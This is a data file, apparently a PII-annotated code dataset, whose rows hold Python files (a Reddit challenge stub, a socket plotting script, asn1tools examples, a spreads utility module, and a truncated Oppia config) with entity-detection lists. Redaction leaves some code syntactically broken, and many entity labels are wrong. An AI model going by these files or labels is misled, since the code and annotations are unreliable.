Unnamed: 0
int64 0
109
| code
stringlengths 1.08k
119k
| length
int64 1.08k
119k
| entities
stringlengths 118
32.3k
|
---|---|---|---|
0 | """
[2014-11-26] Challenge #190 [Intermediate] Words inside of words
https://www.reddit.PI:KEY
#Description
This weeks challenge is a short yet interesting one that should hopefully help you exercise elegant solutions to a
problem rather than bruteforcing a challenge.
#Challenge
Given the wordlist [enable1.txt](http://www.joereynoldsaudio.com/enable1.txt), you must find the word in that file
which also contains the greatest number of words within that word.
For example, the word 'grayson' has the following words in it
Grayson
Gray
Grays
Ray
Rays
Son
On
Here's another example, the word 'reports' has the following
reports
report
port
ports
rep
You're tasked with finding the word in that file that contains the most words.
NOTE : If you have a different wordlist you would like to use, you're free to do so.
#Restrictions
* To keep output slightly shorter, a word will only be considered a word if it is 2 or more letters in length
* The word you are using may not be permuted to get a different set of words (You can't change 'report' to 'repotr' so
that you can add more words to your list)
#Finally
Have a good challenge idea?
Consider submitting it to /r/dailyprogrammer_ideas
"""
def main():
pass
if __name__ == "__main__":
main()
| 1,256 | [['DATE_TIME', '2014-11-26'], ['DATE_TIME', 'This weeks'], ['PERSON', 'enable1.txt](http://www.joereynoldsaudio.com'], ['PERSON', 'grayson'], ['PERSON', 'repotr'], ['URL', 'https://www.red'], ['URL', 'http://www.joereynoldsaudio.com/enable1.txt']] |
1 | from mpl_toolkits.mplot3d import axes3d
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
from socket import *
import time
# Объявляем все глобальные переменные
HOST = '127.0.0.1'
PORT = 21566
BUFSIZ = 512
ADDR = (HOST, PORT)
bad_packet = 0
good_packet = 0
# fig, ax = plt.subplots()
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
# Socket
# tcpCliSock = socket(AF_INET, SOCK_STREAM)
# tcpCliSock.connect(ADDR)
# Запрет на ожидание
plt.ion()
tstart = time.time()
# real-time plotting loop
X, Y, Z = [], [], []
while True:
try:
# читаем данные из сети
tcpCliSock.c
data = tcpCliSock.recv(BUFSIZ)
if data:
print(len(X), data)
data = data.decode().split(',')
if len(data) == 9:
# print('Data received', data)
# tcpCliSock.send(b'Ok')
good_packet += 1
else:
bad_packet += 1
# читаем данные из сети
data = tcpCliSock.recv(BUFSIZ)
X.append(data[0])
Y.append(data[1])
Z.append(data[2])
frame = ax.scatter(X, Y, Z, c='b', marker='o')
# Remove old line collection before drawing
#if oldcol is not None:
# ax.collections.remove(oldcol)
plt.pause(0.001 / len(X))
except KeyboardInterrupt:
tcpCliSock.close()
print('FPS: %f' % (len(X) / (time.time() - tstart)))
break
| 1,493 | [['LOCATION', 'Объявляем'], ['LOCATION', 'PORT'], ['LOCATION', 'tcpCliSock'], ['PERSON', 'данные из'], ['PERSON', 'данные из'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'toolkits.mp'], ['URL', 'matplotlib.py'], ['URL', 'matplotlib.an'], ['URL', 'plt.su'], ['URL', 'plt.fi'], ['URL', 'fig.ad'], ['URL', 'tcpCliSock.co'], ['URL', 'plt.io'], ['URL', 'tcpCliSock.re'], ['URL', 'data.de'], ['URL', 'tcpCliSock.se'], ['URL', 'tcpCliSock.re'], ['URL', 'ax.sc'], ['URL', 'ax.collections.re'], ['URL', 'plt.pa'], ['URL', 'tcpCliSock.cl']] |
2 | #!/usr/bin/env python
"""Encoding and decoding of a question once for each codec.
Example execution:
$ ./question.py
ASN.1 specification:
-- A simple protocol taken from Wikipedia.
Foo DEFINITIONS ::= BEGIN
Question ::= SEQUENCE {
id INTEGER,
question IA5String
}
Answer ::= SEQUENCE {
id INTEGER,
answer BOOLEAN
}
END
Question to encode: {'id': 1, 'question': 'Is 1+1=3?'}
BER:
Encoded: 300e0201011609497320312b313d333f (16 bytes)
Decoded: {'id': 1, 'question': 'Is 1+1=3?'}
DER:
Encoded: 300e0201011609497320312b313d333f (16 bytes)
Decoded: {'id': 1, 'question': 'Is 1+1=3?'}
JER:
Encoded: PI:KEY (31 bytes)
Decoded: {'id': 1, 'question': 'Is 1+1=3?'}
OER:
Encoded: 010109497320312b313d333f (12 bytes)
Decoded: {'id': 1, 'question': 'Is 1+1=3?'}
PER:
Encoded: 010109497320312b313d333f (12 bytes)
Decoded: {'id': 1, 'question': 'Is 1+1=3?'}
UPER:
Encoded: 01010993cd03156c5eb37e (11 bytes)
Decoded: {'id': 1, 'question': 'Is 1+1=3?'}
XER:
Encoded: PI:KEY (61 bytes)
Decoded: {'id': 1, 'question': 'Is 1+1=3?'}
Protocol Buffers:
Encoded: 08011209497320312b313d333f (13 bytes)
Decoded:
id: 1
question: "Is 1+1=3?"
$
"""
from __future__ import print_function
import os
from binascii import hexlify
import asn1tools
from foo_pb2 import Question
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
FOO_ASN_PATH = os.path.join(SCRIPT_DIR,
'..',
'..',
'..',
'tests',
'files',
'foo.asn')
# Print the specification.
print('ASN.1 specification:')
print()
with open(FOO_ASN_PATH) as fin:
print(fin.read())
# The question to encode.
question = {'id': 1, 'question': 'Is 1+1=3?'}
print("Question to encode:", question)
# Encode and decode the question once for each codec.
for codec in ['ber', 'der', 'jer', 'oer', 'per', 'uper', 'xer']:
foo = asn1tools.compile_files(FOO_ASN_PATH, codec)
encoded = foo.encode('Question', question)
decoded = foo.decode('Question', encoded)
print()
print('{}:'.format(codec.upper()))
print('Encoded: {} ({} bytes)'.format(hexlify(encoded).decode('ascii'),
len(encoded)))
print('Decoded:', decoded)
# Also encode using protocol buffers.
question = Question()
question.id = 1
question.question = 'Is 1+1=3?'
encoded = question.SerializeToString()
decoded = question
print()
print('Protocol Buffers:')
print('Encoded: {} ({} bytes)'.format(hexlify(encoded).decode('ascii'),
len(encoded)))
print('Decoded:')
print(decoded)
| 2,721 | [['PERSON', 'ASN.1'], ['DATE_TIME', '010109497320312b313d333f'], ['DATE_TIME', '010109497320312b313d333f'], ['PERSON', 'oer'], ['IP_ADDRESS', ' ::'], ['URL', 'question.py'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'os.path.jo'], ['URL', 'foo.as'], ['URL', 'fin.re'], ['URL', 'asn1tools.com'], ['URL', 'foo.de'], ['URL', 'question.id'], ['URL', 'question.Se']] |
3 | # -*- coding: utf-8 -*-
# Copyright (C) 2014 Johannes Baiter dummy@email.com
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Various utility functions and classes.
"""
from __future__ import division, unicode_literals, print_function
import abc
import glob
import json
import logging
import os
import pkg_resources
import platform
import re
import subprocess
from unicodedata import normalize
import blinker
import colorama
import psutil
import roman
from colorama import Fore, Back, Style
from spreads.vendor.pathlib import Path
class SpreadsException(Exception):
""" General exception """
pass
class DeviceException(SpreadsException):
""" Raised when a device-related error occured. """
pass
class MissingDependencyException(SpreadsException):
""" Raised when a dependency for a plugin is missing. """
pass
def get_version():
""" Get installed version via pkg_resources. """
return pkg_resources.require('spreads')[0].version
def find_in_path(name):
""" Find executable in $PATH.
:param name: name of the executable
:type name: unicode
:returns: Path to executable or None if not found
:rtype: unicode or None
"""
candidates = None
if is_os('windows'):
import _winreg
if name.startswith('scantailor'):
try:
cmd = _winreg.QueryValue(
_winreg.HKEY_CLASSES_ROOT,
'Scan Tailor Project\\shell\\open\\command')
bin_path = cmd.split('" "')[0][1:]
if name.endswith('-cli'):
bin_path = bin_path[:-4] + "-cli.exe"
return bin_path if os.path.exists(bin_path) else None
except OSError:
return None
else:
path_dirs = os.environ.get('PATH').split(';')
path_dirs.append(os.getcwd())
path_exts = os.environ.get('PATHEXT').split(';')
candidates = (os.path.join(p, name + e)
for p in path_dirs
for e in path_exts)
else:
candidates = (os.path.join(p, name)
for p in os.environ.get('PATH').split(':'))
return next((c for c in candidates if os.path.exists(c)), None)
def is_os(osname):
""" Check if the current operating system matches the expected.
:param osname: Operating system name as returned by
:py:func:`platform.system`
:returns: Whether the OS matches or not
:rtype: bool
"""
return platform.system().lower() == osname
def check_futures_exceptions(futures):
"""" Go through passed :py:class:`concurrent.futures._base.Future` objects
and re-raise the first Exception raised by any one of them.
:param futures: Iterable that contains the futures to be checked
:type futures: iterable with :py:class:`concurrent.futures._base.Future`
instances
"""
if any(x.exception() for x in futures):
raise next(x for x in futures if x.exception()).exception()
def get_free_space(path):
""" Return free space on file-system underlying the passed path.
:param path: Path on file-system the free space of which is desired.
:type path; unicode
:return: Free space in bytes.
:rtype: int
"""
return psutil.disk_usage(unicode(path)).free
def get_subprocess(cmdline, **kwargs):
""" Get a :py:class:`subprocess.Popen` instance.
On Windows systems, the process will be ran in the background and won't
open a cmd-window or appear in the taskbar.
The function signature matches that of the :py:class:`subprocess.Popen`
initialization method.
"""
if subprocess.mswindows and 'startupinfo' not in kwargs:
su = subprocess.STARTUPINFO()
su.dwFlags |= subprocess.STARTF_USESHOWWINDOW
su.wShowWindow = subprocess.SW_HIDE
kwargs['startupinfo'] = su
return subprocess.Popen(cmdline, **kwargs)
def wildcardify(pathnames):
""" Try to generate a single path with wildcards that matches all
`pathnames`.
:param pathnames: List of pathnames to find a wildcard string for
:type pathanmes: List of str/unicode
:return: The wildcard string or None if none was found
:rtype: unicode or None
"""
wildcard_str = ""
for idx, char in enumerate(pathnames[0]):
if all(p[idx] == char for p in pathnames[1:]):
wildcard_str += char
elif not wildcard_str or wildcard_str[-1] != "*":
wildcard_str += "*"
matched_paths = glob.glob(wildcard_str)
if not sorted(pathnames) == sorted(matched_paths):
return None
return wildcard_str
def diff_dicts(old, new):
""" Get the difference between two dictionaries.
:param old: Dictionary to base comparison on
:type old: dict
:param new: Dictionary to compare with
:type new: dict
:return: A (possibly nested) dictionary containing all items from `new`
that differ from the ones in `old`
:rtype: dict
"""
out = {}
for key, value in old.iteritems():
if new[key] != value:
out[key] = new[key]
elif isinstance(value, dict):
diff = diff_dicts(value, new[key])
if diff:
out[key] = diff
return out
def slugify(text, delimiter=u'-'):
"""Generates an ASCII-only slug.
Code adapted from Flask snipped by Armin Ronacher:
http://flask.pocoo.org/snippets/5/
:param text: Text to create slug for
:type text: unicode
:param delimiter: Delimiter to use in slug
:type delimiter: unicode
:return: The generated slug
:rtype: unicode
"""
punctuation_re = r'[\t !"#$%&\'()*\-/<=>?@\[\\\]^_`{|},.]+'
result = []
for word in re.split(punctuation_re, text.lower()):
word = normalize('NFKD', word).encode('ascii', 'ignore')
if word:
result.append(word)
return unicode(delimiter.join(result))
class _instancemethodwrapper(object): # noqa
def __init__(self, callable):
self.callable = callable
self.__dontcall__ = False
def __getattr__(self, key):
return getattr(self.callable, key)
def __call__(self, *args, **kwargs):
if self.__dontcall__:
raise TypeError('Attempted to call abstract method.')
return self.callable(*args, **kwargs)
class _classmethod(classmethod): # noqa
def __init__(self, func):
super(_classmethod, self).__init__(func)
isabstractmethod = getattr(func, '__isabstractmethod__', False)
if isabstractmethod:
self.__isabstractmethod__ = isabstractmethod
def __get__(self, instance, owner):
result = _instancemethodwrapper(super(_classmethod, self)
.__get__(instance, owner))
isabstractmethod = getattr(self, '__isabstractmethod__', False)
if isabstractmethod:
result.__isabstractmethod__ = isabstractmethod
abstractmethods = getattr(owner, '__abstractmethods__', None)
if abstractmethods and result.__name__ in abstractmethods:
result.__dontcall__ = True
return result
class abstractclassmethod(_classmethod): # noqa
""" New decorator class that implements the @abstractclassmethod decorator
added in Python 3.3 for Python 2.7.
Kudos to http://stackoverflow.com/a/13640018/487903
"""
def __init__(self, func):
func = abc.abstractmethod(func)
super(abstractclassmethod, self).__init__(func)
class ColourStreamHandler(logging.StreamHandler):
""" A colorized output StreamHandler
Kudos to Leigh MacDonald: http://goo.gl/Lpr6C5
"""
# Some basic colour scheme defaults
colours = {
'DEBUG': Fore.CYAN,
'INFO': Fore.GREEN,
'WARN': Fore.YELLOW,
'WARNING': Fore.YELLOW,
'ERROR': Fore.RED,
'CRIT': Back.RED + Fore.WHITE,
'CRITICAL': Back.RED + Fore.WHITE
}
@property
def is_tty(self):
""" Check if we are using a "real" TTY. If we are not using a TTY it
means that the colour output should be disabled.
:return: Using a TTY status
:rtype: bool
"""
try:
return getattr(self.stream, 'isatty', None)()
except:
return False
def emit(self, record):
try:
message = self.format(record)
if not self.is_tty:
self.stream.write(message)
else:
self.stream.write(self.colours[record.levelname] +
message + Style.RESET_ALL)
self.stream.write(getattr(self, 'terminator', '\n'))
self.flush()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class EventHandler(logging.Handler):
""" Subclass of :py:class:`logging.Handler` that emits a
:py:class:`blinker.base.Signal` whenever a new record is emitted.
"""
signals = blinker.Namespace()
on_log_emit = signals.signal('logrecord', doc="""\
Sent when a log record was emitted.
:keyword :class:`logging.LogRecord` record: the LogRecord
""")
def emit(self, record):
self.on_log_emit.send(record=record)
def get_data_dir(create=False):
""" Return (and optionally create) the user's default data directory.
:param create: Create the data directory if it doesn't exist
:type create: bool
:return: Path to the default data directory
:rtype: unicode
"""
unix_dir_var = 'XDG_DATA_HOME'
unix_dir_fallback = '~/.config'
windows_dir_var = 'APPDATA'
windows_dir_fallback = '~\\AppData\\Roaming'
mac_dir = '~/Library/Application Support'
base_dir = None
if is_os('darwin'):
if Path(unix_dir_fallback).exists:
base_dir = unix_dir_fallback
else:
base_dir = mac_dir
elif is_os('windows'):
if windows_dir_var in os.environ:
base_dir = os.environ[windows_dir_var]
else:
base_dir = windows_dir_fallback
else:
if unix_dir_var in os.environ:
base_dir = os.environ[unix_dir_var]
else:
base_dir = unix_dir_fallback
app_path = Path(base_dir)/'spreads'
if create and not app_path.exists():
app_path.mkdir()
return unicode(app_path)
def colorize(text, color):
""" Return text with a new ANSI foreground color.
:param text: Text to be wrapped
:param color: ANSI color to wrap text in
:type color: str (from `colorama.ansi <http://git.io/9qnt0Q>`)
:return: Colorized text
"""
return color + text + colorama.Fore.RESET
class RomanNumeral(object):
""" Number type that represents integers as Roman numerals and that
can be used in all arithmetic operations applicable to integers.
"""
@staticmethod
def is_roman(value):
""" Check if `value` is a valid Roman numeral.
:param value: Value to be checked
:type value: unicode
:returns: Whether the value is valid or not
:rtype: bool
"""
return bool(roman.romanNumeralPattern.match(value))
def __init__(self, value, case='upper'):
""" Create a new instance.
:param value: Value of the instance
:type value: int, unicode containing valid Roman numeral or
:py:class:`RomanNumeral`
"""
self._val = self._to_int(value)
self._case = case
if isinstance(value, basestring) and not self.is_roman(value):
self._case = 'lower'
elif isinstance(value, RomanNumeral):
self._case = value._case
def _to_int(self, value):
if isinstance(value, int):
return value
elif isinstance(value, basestring) and self.is_roman(value.upper()):
return roman.fromRoman(value.upper())
elif isinstance(value, RomanNumeral):
return value._val
else:
raise ValueError("Value must be a valid roman numeral, a string"
" representing one or an integer: '{0}'"
.format(value))
def __cmp__(self, other):
if self._val > self._to_int(other):
return 1
elif self._val == self._to_int(other):
return 0
elif self._val < self._to_int(other):
return -1
def __add__(self, other):
return RomanNumeral(self._val + self._to_int(other), self._case)
def __sub__(self, other):
return RomanNumeral(self._val - self._to_int(other), self._case)
def __int__(self):
return self._val
def __str__(self):
strval = roman.toRoman(self._val)
if self._case == 'lower':
return strval.lower()
else:
return strval
def __unicode__(self):
return unicode(str(self))
def __repr__(self):
return str(self)
class CustomJSONEncoder(json.JSONEncoder):
""" Custom :py:class:`json.JSONEncoder`.
Uses an object's `to_dict` method if present for serialization.
Serializes :py:class:`pathlib.Path` instances to the string
representation of their relative path to a BagIt-compliant directory or
their absolute path if not applicable.
"""
def default(self, obj):
if hasattr(obj, 'to_dict'):
return obj.to_dict()
if isinstance(obj, Path):
# Serialize paths that belong to a workflow as paths relative to
# its base directory
base = next((p for p in obj.parents if (p/'bagit.txt').exists()),
None)
if base:
return unicode(obj.relative_to(base))
else:
return unicode(obj.absolute())
return json.JSONEncoder.default(self, obj)
| 14,758 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Johannes Baiter'], ['PERSON', 'get_subprocess(cmdline'], ['PERSON', 'Armin Ronacher'], ['PERSON', 'punctuation_re'], ['PERSON', 'Kudos'], ['PERSON', 'Leigh MacDonald'], ['URL', 'blinker.Na'], ['URL', 'signals.si'], ['NRP', 'Serialize'], ['LOCATION', 'next((p'], ['LOCATION', 'unicode(obj.relative_to(base'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'http://flask.pocoo.org/snippets/5/'], ['URL', 'http://stackoverflow.com/a/13640018/487903'], ['URL', 'http://goo.gl/Lpr6C5'], ['URL', 'http://git.io/9qnt0Q'], ['URL', 'email.com'], ['URL', 'spreads.vendor.pa'], ['URL', 'resources.re'], ['URL', 'name.st'], ['URL', 'winreg.HK'], ['URL', 'os.pa'], ['URL', 'os.environ.ge'], ['URL', 'os.ge'], ['URL', 'os.environ.ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.environ.ge'], ['URL', 'os.pa'], ['URL', 'platform.sy'], ['URL', 'platform.sy'], ['URL', 'subprocess.ms'], ['URL', 'subprocess.ST'], ['URL', 'subprocess.ST'], ['URL', 'su.wS'], ['URL', 'glob.gl'], ['URL', 'old.it'], ['URL', 'delimiter.jo'], ['URL', 'self.ca'], ['URL', 'self.ca'], ['URL', 'self.ca'], ['URL', 'logging.St'], ['URL', 'Fore.CY'], ['URL', 'Fore.GR'], ['URL', 'Fore.YE'], ['URL', 'Fore.YE'], ['URL', 'Fore.RED'], ['URL', 'Back.RED'], ['URL', 'Back.RED'], ['URL', 'self.st'], ['URL', 'self.fo'], ['URL', 'self.is'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.co'], ['URL', 'Style.RE'], ['URL', 'self.st'], ['URL', 'blinker.base.Si'], ['URL', 'emit.se'], ['URL', 'path.mk'], ['URL', 'colorama.an'], ['URL', 'colorama.Fore.RE'], ['URL', 'roman.romanNumeralPattern.ma'], ['URL', 'self.is'], ['URL', 'self.is'], ['URL', 'roman.fr'], ['URL', 'roman.to'], ['URL', 'pathlib.Pa'], ['URL', 'obj.to'], ['URL', 'obj.pa'], ['URL', 'obj.re'], ['URL', 'json.JSONEncoder.de']] |
4 | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Stores various configuration options and constants for Oppia."""
import copy
import datetime
import os
# Whether to unconditionally log info messages.
DEBUG = False
# The platform for the storage backend. This is used in the model-switching
# code in core/platform.
PLATFORM = 'gae'
# This should be string comparison, since all environment variables
# are converted to string
IS_MINIFIED = os.environ.get('MINIFICATION') == 'True'
# Whether we should serve the development or production experience.
# DEV_MODE should only be changed to False in the production environment.
# To use minified resources in the development environment,
# change the MINIFICATION env variable in app.yaml to True.
# When DEV_MODE is True, this indicates that we are not running in
# the production App Engine environment, which affects things like
# login/logout URLs,as well as third-party libraries
# that App Engine normally provides.
if PLATFORM == 'gae':
DEV_MODE = (
not os.environ.get('SERVER_SOFTWARE')
or os.environ['SERVER_SOFTWARE'].startswith('Development'))
else:
raise Exception('Invalid platform: expected one of [\'gae\']')
TESTS_DATA_DIR = os.path.join('core', 'tests', 'data')
SAMPLE_EXPLORATIONS_DIR = os.path.join('data', 'explorations')
SAMPLE_COLLECTIONS_DIR = os.path.join('data', 'collections')
INTERACTIONS_DIR = os.path.join('extensions', 'interactions')
GADGETS_DIR = os.path.join('extensions', 'gadgets')
RTE_EXTENSIONS_DIR = os.path.join('extensions', 'rich_text_components')
OBJECT_TEMPLATES_DIR = os.path.join('extensions', 'objects', 'templates')
# Choose production template if minification flag is used or
# if in production mode
TEMPLATES_DIR_PREFIX = 'prod' if (IS_MINIFIED or not DEV_MODE) else 'dev'
FRONTEND_TEMPLATES_DIR = os.path.join(
'core', 'templates', TEMPLATES_DIR_PREFIX, 'head')
DEPENDENCIES_TEMPLATES_DIR = os.path.join('extensions', 'dependencies')
VALUE_GENERATORS_DIR = os.path.join('extensions', 'value_generators')
OBJECT_DEFAULT_VALUES_FILE_PATH = os.path.join(
'extensions', 'interactions', 'object_defaults.json')
RULES_DESCRIPTIONS_FILE_PATH = os.path.join(
os.getcwd(), 'extensions', 'interactions', 'rules.json')
# The maximum number of results to retrieve in a datastore query.
DEFAULT_QUERY_LIMIT = 1000
# The maximum number of results to retrieve in a datastore query
# for top rated published explorations in /library page.
NUMBER_OF_TOP_RATED_EXPLORATIONS_FOR_LIBRARY_PAGE = 8
# The maximum number of results to retrieve in a datastore query
# for recently published explorations in /library page.
RECENTLY_PUBLISHED_QUERY_LIMIT_FOR_LIBRARY_PAGE = 8
# The maximum number of results to retrieve in a datastore query
# for top rated published explorations in /library/top_rated page.
NUMBER_OF_TOP_RATED_EXPLORATIONS_FULL_PAGE = 20
# The maximum number of results to retrieve in a datastore query
# for recently published explorations in /library/recently_published page.
RECENTLY_PUBLISHED_QUERY_LIMIT_FULL_PAGE = 20
# The current version of the dashboard stats blob schema. If any backward-
# incompatible changes are made to the stats blob schema in the data store,
# this version number must be changed.
CURRENT_DASHBOARD_STATS_SCHEMA_VERSION = 1
# The current version of the exploration states blob schema. If any backward-
# incompatible changes are made to the states blob schema in the data store,
# this version number must be changed and the exploration migration job
# executed.
CURRENT_EXPLORATION_STATES_SCHEMA_VERSION = 7
# The current version of the all collection blob schemas (such as the nodes
# structure within the Collection domain object). If any backward-incompatible
# changes are made to any of the blob schemas in the data store, this version
# number must be changed.
CURRENT_COLLECTION_SCHEMA_VERSION = 2
# The default number of exploration tiles to load at a time in the search
# results page.
SEARCH_RESULTS_PAGE_SIZE = 20
# The default number of commits to show on a page in the exploration history
# tab.
COMMIT_LIST_PAGE_SIZE = 50
# The default number of items to show on a page in the exploration feedback
# tab.
FEEDBACK_TAB_PAGE_SIZE = 20
# Default title for a newly-minted exploration.
DEFAULT_EXPLORATION_TITLE = ''
# Default category for a newly-minted exploration.
DEFAULT_EXPLORATION_CATEGORY = ''
# Default objective for a newly-minted exploration.
DEFAULT_EXPLORATION_OBJECTIVE = ''
# Default name for the initial state of an exploration.
DEFAULT_INIT_STATE_NAME = 'Introduction'
# The default content text for the initial state of an exploration.
DEFAULT_INIT_STATE_CONTENT_STR = ''
# Default title for a newly-minted collection.
DEFAULT_COLLECTION_TITLE = ''
# Default category for a newly-minted collection.
DEFAULT_COLLECTION_CATEGORY = ''
# Default objective for a newly-minted collection.
DEFAULT_COLLECTION_OBJECTIVE = ''
# A dict containing the accepted image formats (as determined by the imghdr
# module) and the corresponding allowed extensions in the filenames of uploaded
# files.
ACCEPTED_IMAGE_FORMATS_AND_EXTENSIONS = {
'jpeg': ['jpg', 'jpeg'],
'png': ['png'],
'gif': ['gif']
}
# A string containing the disallowed characters in state or exploration names.
# The underscore is needed because spaces in names must be converted to
# underscores when displayed as part of a URL or key. The other conventions
# here are derived from the Wikipedia guidelines for naming articles.
INVALID_NAME_CHARS = u':#/|_%<>[]{}\ufffd\\' + chr(127)
for ind in range(32):
INVALID_NAME_CHARS += chr(ind)
# Prefix for data sent from the server to the client via JSON.
XSSI_PREFIX = ')]}\'\n'
# A regular expression for alphanumeric characters.
ALPHANUMERIC_REGEX = r'^[A-Za-z0-9]+$'
# A regular expression for alphanumeric words separated by single spaces.
# Ex.: 'valid name', 'another valid name', 'invalid name'.
ALPHANUMERIC_SPACE_REGEX = r'^[0-9A-Za-z]+(?:[ ]?[0-9A-Za-z]+)*$'
# A regular expression for tags.
TAG_REGEX = r'^[a-z ]+$'
# Invalid names for parameters used in expressions.
AUTOMATICALLY_SET_PARAMETER_NAMES = ['answer', 'choices']
INVALID_PARAMETER_NAMES = AUTOMATICALLY_SET_PARAMETER_NAMES + [
'abs', 'all', 'and', 'any', 'else', 'floor', 'if', 'log', 'or',
'pow', 'round', 'then']
# These are here rather than in rating_services.py to avoid import
# circularities with exp_services.
# TODO (Jacob) Refactor exp_services to remove this problem.
_EMPTY_RATINGS = {'1': 0, '2': 0, '3': 0, '4': 0, '5': 0}
def get_empty_ratings():
return copy.deepcopy(_EMPTY_RATINGS)
# Empty scaled average rating as a float.
EMPTY_SCALED_AVERAGE_RATING = 0.0
# To use GAE email service.
EMAIL_SERVICE_PROVIDER_GAE = 'gae_email_service'
# To use mailgun email service.
EMAIL_SERVICE_PROVIDER_MAILGUN = 'mailgun_email_service'
# Use GAE email service by default.
EMAIL_SERVICE_PROVIDER = EMAIL_SERVICE_PROVIDER_GAE
# If the Mailgun email API is used, the "None" below should be replaced
# with the Mailgun API key.
MAILGUN_API_KEY = None
# If the Mailgun email API is used, the "None" below should be replaced
# with the Mailgun domain name (ending with mailgun.org).
MAILGUN_DOMAIN_NAME = None
# Committer id for system actions.
SYSTEM_COMMITTER_ID = 'admin'
SYSTEM_EMAIL_ADDRESS = dummy@email.com'
ADMIN_EMAIL_ADDRESS = dummy@email.com'
NOREPLY_EMAIL_ADDRESS = dummy@email.com'
# Ensure that SYSTEM_EMAIL_ADDRESS and ADMIN_EMAIL_ADDRESS are both valid and
# correspond to owners of the app before setting this to True. If
# SYSTEM_EMAIL_ADDRESS is not that of an app owner, email messages from this
# address cannot be sent. If True then emails can be sent to any user.
CAN_SEND_EMAILS = False
# If you want to turn on this facility please check the email templates in the
# send_role_notification_email() function in email_manager.py and modify them
# accordingly.
CAN_SEND_EDITOR_ROLE_EMAILS = False
# If enabled then emails will be sent to creators for feedback messages.
CAN_SEND_FEEDBACK_MESSAGE_EMAILS = False
# Time to wait before sending feedback message emails (currently set to 1
# hour).
DEFAULT_FEEDBACK_MESSAGE_EMAIL_COUNTDOWN_SECS = 3600
# Whether to send an email when new feedback message is received for
# an exploration.
DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE = True
# Whether to send email updates to a user who has not specified a preference.
DEFAULT_EMAIL_UPDATES_PREFERENCE = False
# Whether to send an invitation email when the user is granted
# new role permissions in an exploration.
DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE = True
# Whether to require an email to be sent, following a moderator action.
REQUIRE_EMAIL_ON_MODERATOR_ACTION = False
# Whether to allow custom event reporting to Google Analytics.
CAN_SEND_ANALYTICS_EVENTS = False
# Timespan in minutes before allowing duplicate emails.
DUPLICATE_EMAIL_INTERVAL_MINS = 2
# Number of digits after decimal to which the average ratings value in the
# dashboard is rounded off to.
AVERAGE_RATINGS_DASHBOARD_PRECISION = 2
EMAIL_INTENT_SIGNUP = 'signup'
EMAIL_INTENT_DAILY_BATCH = 'daily_batch'
EMAIL_INTENT_EDITOR_ROLE_NOTIFICATION = 'editor_role_notification'
EMAIL_INTENT_FEEDBACK_MESSAGE_NOTIFICATION = 'feedback_message_notification'
EMAIL_INTENT_SUGGESTION_NOTIFICATION = 'suggestion_notification'
EMAIL_INTENT_REPORT_BAD_CONTENT = 'report_bad_content'
EMAIL_INTENT_MARKETING = 'marketing'
EMAIL_INTENT_PUBLICIZE_EXPLORATION = 'publicize_exploration'
EMAIL_INTENT_UNPUBLISH_EXPLORATION = 'unpublish_exploration'
EMAIL_INTENT_DELETE_EXPLORATION = 'delete_exploration'
MODERATOR_ACTION_PUBLICIZE_EXPLORATION = 'publicize_exploration'
MODERATOR_ACTION_UNPUBLISH_EXPLORATION = 'unpublish_exploration'
DEFAULT_SALUTATION_HTML_FN = (
lambda recipient_username: 'Hi %s,' % recipient_username)
DEFAULT_SIGNOFF_HTML_FN = (
lambda sender_username: (
'Thanks!<br>%s (Oppia moderator)' % sender_username))
VALID_MODERATOR_ACTIONS = {
MODERATOR_ACTION_PUBLICIZE_EXPLORATION: {
'email_config': 'publicize_exploration_email_html_body',
'email_subject_fn': (
lambda exp_title: (
'Your Oppia exploration "%s" has been featured!' % exp_title)),
'email_intent': EMAIL_INTENT_PUBLICIZE_EXPLORATION,
'email_salutation_html_fn': DEFAULT_SALUTATION_HTML_FN,
'email_signoff_html_fn': DEFAULT_SIGNOFF_HTML_FN,
},
MODERATOR_ACTION_UNPUBLISH_EXPLORATION: {
'email_config': 'unpublish_exploration_email_html_body',
'email_subject_fn': (
lambda exp_title: (
'Your Oppia exploration "%s" has been unpublished' % exp_title)
),
'email_intent': 'unpublish_exploration',
'email_salutation_html_fn': DEFAULT_SALUTATION_HTML_FN,
'email_signoff_html_fn': DEFAULT_SIGNOFF_HTML_FN,
},
}
# Panel properties and other constants for the default skin.
GADGET_PANEL_AXIS_HORIZONTAL = 'horizontal'
PANELS_PROPERTIES = {
'bottom': {
'width': 350,
'height': 100,
'stackable_axis': GADGET_PANEL_AXIS_HORIZONTAL,
'pixels_between_gadgets': 80,
'max_gadgets': 1
}
}
# When the site terms were last updated, in UTC.
REGISTRATION_PAGE_LAST_UPDATED_UTC = datetime.datetime(2015, 10, 14, 2, 40, 0)
# Format of string for dashboard statistics logs.
# NOTE TO DEVELOPERS: This format should not be changed, since it is used in
# the existing storage models for UserStatsModel.
DASHBOARD_STATS_DATETIME_STRING_FORMAT = '%Y-%m-%d'
# The maximum size of an uploaded file, in bytes.
MAX_FILE_SIZE_BYTES = 1048576
# The default language code for an exploration.
